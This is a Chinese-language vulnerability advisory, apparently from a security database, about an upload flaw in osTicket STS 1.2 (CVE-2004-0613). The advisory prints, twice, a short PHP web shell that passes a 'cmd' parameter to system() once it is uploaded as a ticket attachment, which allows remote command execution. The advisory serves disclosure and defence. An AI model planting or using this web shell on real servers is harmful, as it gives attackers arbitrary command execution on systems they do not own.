发布日期：2004-06-21
更新日期：2004-06-25

受影响系统：

osTicket osTicket STS 1.2

描述：

---

BUGTRAQ  ID: 10586
CVE(CAN) ID: CVE-2004-0613

osTicket是一款基于WEB的客户服务管理程序。

osTicket的上传功能实现存在问题，远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行任意命令。

用户建立一个新的ticket，然后以这个ticket上传一个文件，就可以用以下方式访问：

www.example.com/osticket/attachments/

如果用户上传的PHP文档包含如下内容：

<?PHP
echo "<form action = ''><input type = 'text' name = 'cmd' value = '$cmd' size = '75'><BR>";
if (!$cmd)die;
system($cmd);
?>

就可以点击脚本在服务器上运行命令。

<*来源：Guy Pearce （dt_student@hotmail.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=108786779500957&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Guy Pearce （dt_student@hotmail.com）提供了如下测试方法：

<?PHP
echo "<form action = ''><input type = 'text' name = 'cmd' value = '$cmd' size = '75'><BR>";
if (!$cmd)die;
system($cmd);
?>

建议：

---

厂商补丁：

osTicket
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.osticket.com/

浏览次数：3538
严重程度：0（网友投票）